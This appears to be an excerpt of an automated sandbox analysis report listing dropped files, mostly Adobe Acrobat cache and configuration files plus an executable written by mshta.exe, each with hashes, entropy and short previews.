                                                                                        SHA-512:610482A6FAE96C5D35E66A6CD59F750601FFA067DB267F31929216E21B1882E332C9577E9319D8C784A535A85EF070C2311F9825970FEDBD44A9DF6145C635B9
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):294
                                                                                        Entropy (8bit):5.297416640583964
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfBD2G6UpnrPeUkwRe9:YvXKXXggfsdTeOVcQzGR22cUkee9
                                                                                        MD5:7801547EA1D82FC07CE7FA951D9CB394
                                                                                        SHA1:8AD4164067D0F9996066F1D2BE5470B475B795FC
                                                                                        SHA-256:5B50B8B349F8221BA4E88B827D5C22A27E00EC6EF0FBC613789CF8E392380F42
                                                                                        SHA-512:405E7757E9AEF87B8FFE70A5A770CA7C6F7682ECB4CD836710187BBD6FC58AAEBDF18A3F8705A0DD423543C6120C9AA3E942F7D5129FE763BFC6349017D30E98
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):285
                                                                                        Entropy (8bit):5.37045493001599
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfPmwrPeUkwRe9:YvXKXXggfsdTeOVcQzGH56Ukee9
                                                                                        MD5:8D8DD8512EC802E32419394DBB3874B8
                                                                                        SHA1:2840522646B87903C07B273998A28ACC5B8263EA
                                                                                        SHA-256:CD619DD6A1F8E86F4D1B4A683F79E6C573D7CC7E2049BC2E47A6D9FE0A978FC9
                                                                                        SHA-512:0D5A6383A52D1A9497F07F895C3CCE37062DDD262A2B2C33DADB5FAC1EEE25FE0DC61D119C8BBC238BCD6E0D3A6ACF6EB9D5420EFD62D7C8BDEDEE84F3E88E7C
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1123
                                                                                        Entropy (8bit):5.689221089414709
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Yv6XXtmeOVKpLgE9cQx8LennAvzBvkn0RCmK8czOCCSG:YvaIezhgy6SAFv5Ah8cv/G
                                                                                        MD5:E998C74F596A92E35B6F732AB820FB94
                                                                                        SHA1:0223B2544C54E802B274DE935D7FC2B5C8EFDC9A
                                                                                        SHA-256:5B3147F310DA7B3F69F39A2D12D80D7A1F703623523C4742A79069D53872DBDD
                                                                                        SHA-512:7E0BA993697941A8F5F1C3BEF9985FB4DBBFEE45E2134DF020AECC1CCDB42AB713985974BF7759DF5D79562ED2FA6038E0F998F34632B672AF650BEBB15241F6
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.305741763185677
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJf8dPeUkwRe9:YvXKXXggfsdTeOVcQzGU8Ukee9
                                                                                        MD5:D97D2B4D4A5141A202E1C44537F7EB07
                                                                                        SHA1:CBAE8AE4B342C4E65A7287CA4A25E940A62B3A73
                                                                                        SHA-256:A56515880F814387731863B089C6F7B2A31D262A27DF27CF32D8BC5A92F198CF
                                                                                        SHA-512:EA798AB4F2796FE38B00509F8CC725C2AAFDFC5DB775A119B7AE39356E25FA76528A6CE8E2B1C9219DC48581DCBB93AFE24E401033B4F39EA59449CB91D3D098
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):292
                                                                                        Entropy (8bit):5.309583408092351
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfQ1rPeUkwRe9:YvXKXXggfsdTeOVcQzGY16Ukee9
                                                                                        MD5:C4459D9B511197679385414F8EF15382
                                                                                        SHA1:C85F0D6E5CF093B4A9230797F06672744E27B21E
                                                                                        SHA-256:1AB14020BB8C44B33033B51F0BA4580AE23F07220BCD240AADE2506322AC56B6
                                                                                        SHA-512:C5F89EEC6360C7FDC23BE55C3C8D66E054DF9EBF65BEC83EEF0496A22E82E658EFD891AE098FCFE33A0CEF1F0AC93BDF0D74C2D9FA4CBECF95624E5FF797434C
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.325202968244981
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfFldPeUkwRe9:YvXKXXggfsdTeOVcQzGz8Ukee9
                                                                                        MD5:A3AF0F7E2C4F523FC6755B54D992993C
                                                                                        SHA1:B75D2E89A4483553B35E8B78708337064F7C8A03
                                                                                        SHA-256:D14670536904AE1B27FD29FBA9207AF3CFD001FFAF37A91F80909D6F75F520EA
                                                                                        SHA-512:2DF90D6DE0035EEFE71B7A514D01AD3F5EEC3D2EFFDC2DAE723833C256270B9F1864B0DEC70CFFA92494ADE2D9C3FDC2F9E6F4A3A22BE2C116BE20159D39ABF3
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):295
                                                                                        Entropy (8bit):5.331757036828842
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfzdPeUkwRe9:YvXKXXggfsdTeOVcQzGb8Ukee9
                                                                                        MD5:4B3196305A0C3B342F80441430CBA4C6
                                                                                        SHA1:A38CF26418BA363E72A0D9826912EDB33F40AA90
                                                                                        SHA-256:448B726AE743F3AAD23B13724A889D53E12A7FC296E018536F41D5DDD730E393
                                                                                        SHA-512:0E7975C8C183856F29F100B8DE15BD7AF44BA2F7703C173C6346624E9C87A9AFE3BF47A84EE9D781F8F26B684B0B548BBB346D4F59A5FAD7F62D99051C9ADC78
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.312658082354993
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfYdPeUkwRe9:YvXKXXggfsdTeOVcQzGg8Ukee9
                                                                                        MD5:3857CBE6B95AC62F151D53439FDBDCFC
                                                                                        SHA1:9E4634956D8EADF83EEFA5C8B8432252B72D0123
                                                                                        SHA-256:52C44C2D4A5615FEFEC6D57573242F9D47EF3C73E60F905553CC53B47254DDE9
                                                                                        SHA-512:B6D438FDE52FB4A445C64213B34B2198427CCE8215ADBD941433AE9A468E78DA7D93B4F9885906E3C6004F06DBB28F61DE156D174E03904A08604B193B437ECD
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):284
                                                                                        Entropy (8bit):5.2992302996680944
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJf+dPeUkwRe9:YvXKXXggfsdTeOVcQzG28Ukee9
                                                                                        MD5:B7BAE08D9D827D517E9CA7D869572E8C
                                                                                        SHA1:FABEBEEF8C029BA9ED719EBC884B571DFB00D9D4
                                                                                        SHA-256:55E911AC4905C1C124C79115D40C6C15FFD6A2B5E1A6EEA33BCDB927DAEA19E8
                                                                                        SHA-512:01FF30057428A515C5CC327E86562E487898B6A8F41B4639DF9F2C0A5E9CB4B03F0E2387520DEF3FAC1BFFAFE17505DBD32A71D2C7AD7B2AE57EB00EEC34945A
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):291
                                                                                        Entropy (8bit):5.296118182899268
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfbPtdPeUkwRe9:YvXKXXggfsdTeOVcQzGDV8Ukee9
                                                                                        MD5:4E4B3BC0235B8BBBBFF1356AAFDA7605
                                                                                        SHA1:DA70BEE1B32591E21965E42A09625C3DA240ACCF
                                                                                        SHA-256:32B00E23BBB3070DB0DF9070FB3DEE8E9E65CC0543A0EB15588BFC81FB0D6C58
                                                                                        SHA-512:7AEA99D84BEA683F78167DEE570A189B52E9B9AE751B220CCBA852D48945E0BBC676F52745A8B6C4C85D16C10E97E93F1C86A4B3BB511D2948691F67A06B0CA6
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):287
                                                                                        Entropy (8bit):5.300944842298216
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJf21rPeUkwRe9:YvXKXXggfsdTeOVcQzG+16Ukee9
                                                                                        MD5:D02E6E2FE7857CDF57F346082EF5E52C
                                                                                        SHA1:6E8B7B626558B67A4CBF256E50E05F6CAC99AEA3
                                                                                        SHA-256:F5A965D54BFFFCE0EDBF39311A9782A3BFA24A0D7517D56CCD3A65A0F801CC22
                                                                                        SHA-512:D9C2F393BCA162F580948B902C1AF979DD99828775448B152F73D75085F02FE564DA4A844778C783335FF66C3B5ED5928B21C082D49165BE97641162BEF63D0F
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1090
                                                                                        Entropy (8bit):5.664604390380976
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Yv6XXtmeOVWamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSG:YvaIezBgkDMUJUAh8cvMG
                                                                                        MD5:3318D5CA6FB90D826A66D67D0908CE71
                                                                                        SHA1:C6DA5B46997375A033FA5A6426D36E690B27C37A
                                                                                        SHA-256:82B31790528F7391D1D9B484CA421B648FE1D0B58A6279A2C709906114E52B3A
                                                                                        SHA-512:1B03E0F50054F09BF5063C9BB7378E0B7DEAD9435504E91C8640F6366E4FA7BF769627B292B132B10CE198C17DEC3504956882F2120F2D464D44EFE1F52D9EB6
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):286
                                                                                        Entropy (8bit):5.276630755733246
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfshHHrPeUkwRe9:YvXKXXggfsdTeOVcQzGUUUkee9
                                                                                        MD5:EFE965047820F42E70945EB27450A2C1
                                                                                        SHA1:3E95CA23B87C02D044F5C9AACC9CF9926395971E
                                                                                        SHA-256:0A616C1D2C29C5BAA56F57E0B8020016F4454BDDE646305B324D71D667123DB4
                                                                                        SHA-512:93244F03D215E806FAE3EC8F5BABCDBC0BB944661066052D96730CA9CE508DB7299D260F841808D7D6F37C161EFFEEF4E73680E57F619FD073891E82691DE345
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):282
                                                                                        Entropy (8bit):5.293706947682101
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJTqgFCrPeUkwRe9:YvXKXXggfsdTeOVcQzGTq16Ukee9
                                                                                        MD5:55941BED237DD326101FA78CBC24C89B
                                                                                        SHA1:704A0D6BDB2BA44D067FD051BB7E94EA7726A9D5
                                                                                        SHA-256:14A85C067C7CA1C0FFA5358C70508777B3A068F71BB3E4E62ED3C56130F187C4
                                                                                        SHA-512:2F29533F7A42F53B17B9724F27DC63BD429C7ED06A4E37DB2922E753931F9B2A19F307C14AE15959715BCEA3306C28E58E2C61580D7B3A8DB8413ACF2926BC43
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):4
                                                                                        Entropy (8bit):0.8112781244591328
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:e:e
                                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                        Malicious:false
                                                                                        Preview:....
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2814
                                                                                        Entropy (8bit):5.1467526352214
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:YmEKGaoEayZtGJGBaBJTrKX6tsLK7lZKW21PjzKOj0SHfGeC2U/2LSHRCwKy58fI:YXN6QT06i9kDjDKo8evW9o3
                                                                                        MD5:C25690B3AB58D2784F3777FC90D450C3
                                                                                        SHA1:1D75F7BD5C7D18A042A22C7B8C2BFDF60870A5B6
                                                                                        SHA-256:AB2452EEE091E706CCF492406445416A7356A415DA289773B362F8F79891C23D
                                                                                        SHA-512:58D895047F26CD08793AA0349B5997BB4A1D8DF1D64F18215FC7E67D82C2A2224920486014D47A0200B5F71B18B12A7DA76115A64E5C5184932436A82AC56F1E
                                                                                        Malicious:false
                                                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"147bf335dbe421c5fd107f5137162081","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734551749000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"dec2e4f95859489a2435f71c6e749753","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734551749000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"c9ba6b9fa7095b018c416000f4b24c85","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734551749000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"0baec62f55896459403f4b59ac14bdb1","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734551749000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"c0ea43d9f870bb6920dd9a57c56fedbe","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734551749000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"403e073ec789bd31236fb8fa68eb7aa9","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                        Category:dropped
                                                                                        Size (bytes):12288
                                                                                        Entropy (8bit):1.4519051191448515
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsJZlbF:lNVmsw3SHtbDbPe0K3+fDZd8
                                                                                        MD5:4B49DFA03CFCE83894064E3194FE105D
                                                                                        SHA1:5B6D822989342C6BBD2613474C0AA7D0272823B2
                                                                                        SHA-256:5EF7FCB890980F260BE1B13B939F4664BAFF3DCAE8F1EDD2B2C34D9D11CB0550
                                                                                        SHA-512:671AD31A11D2AB77F3168CCA90881B3AD4EA45D989FB8D24672FF8CA9F07F0DDF75FF157FFBC604B499DFB0AAE07DA864FA1CDD748C80200108EC42E41C6765B
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite Rollback Journal
                                                                                        Category:dropped
                                                                                        Size (bytes):8720
                                                                                        Entropy (8bit):1.9542466298968424
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:7MOrvrBd6dHtbGIbPe0K3+fDy2dsJsWqFl2GL7ms3:7j3SHtbDbPe0K3+fDZdOKVms3
                                                                                        MD5:4BBD6504E56B50E9350A910C68243CE3
                                                                                        SHA1:EFC2CC1462A72807A28055D17A113948C9F44481
                                                                                        SHA-256:0A9FC370FF4633A6BAAB8821EEC5B93A39829D59B31D0FAE116A96AB8671FD36
                                                                                        SHA-512:69C37089D075B3337A744A4C0AF05E08829437596CAEE07EF2D5A499F4EC6D5391780A45EB7D02201948D36902B9F5BFBB3AE12CF7E142B52D0B02DFC7C838BD
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):66726
                                                                                        Entropy (8bit):5.392739213842091
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEgOkxFVuH0X7ayKNzX32JXfG+wwrYyu:6a6TZ44ADEOkxP20XqNz29rK
                                                                                        MD5:C16F655111D93ED182122CB09AC81893
                                                                                        SHA1:E340BE79225E5B38B118F177093CAB714D7C056B
                                                                                        SHA-256:A101F805F02C66FCE2126AECE3E0DA6CD14B817D922D979FF0D934A8207B358B
                                                                                        SHA-512:04F82563C9FC09951EDEAB87AE9D91DF16CF30836A13BD776901DE15927075DA4283812FDB4215FB8FCE21C4963BC3441DC979A148B5C20018EF56FAD4FC97EA
                                                                                        Malicious:false
                                                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                        Process:C:\Windows\System32\mshta.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):76609
                                                                                        Entropy (8bit):4.923042039679657
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:fsnZcnsXsnZcnsEW3psnZcns8CsnZcns:EZcbZcA3KZcdZc
                                                                                        MD5:519C2DB854DB03CA32D2179DE50DC2B7
                                                                                        SHA1:94A3C9D4075DC8E809A8F39DF073EAF7AFFBFBAB
                                                                                        SHA-256:72C15EAE246F4FA60B0D4CEAA97029CA4691E56459BBE7C1348DC51488F9231F
                                                                                        SHA-512:4F1A9565710EA5DAA354B53C961E32140343A250B3E07AAFBBB3129810DD4A5378FB5C2F4D8538F661BF7590E07C20030BDE997FA21B911298F186950DE1D5DA
                                                                                        Malicious:false
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..W..W..C...V..C...U..C...C..C...P..W..s..C...V..C.|.V..C...V..RichW..........................PE..L...C.05............................@........ ....@..........................`......._....@...... ...........................0..P....@.......................P..@.......T............................................0...............................text...t........................... ..`.data...p.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..@....P.......&..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):0.34726597513537405
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlll:Nll
                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                        Malicious:false
                                                                                        Preview:@...e...........................................................
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):246
                                                                                        Entropy (8bit):3.513199765407527
                                                                                        Encrypted:false
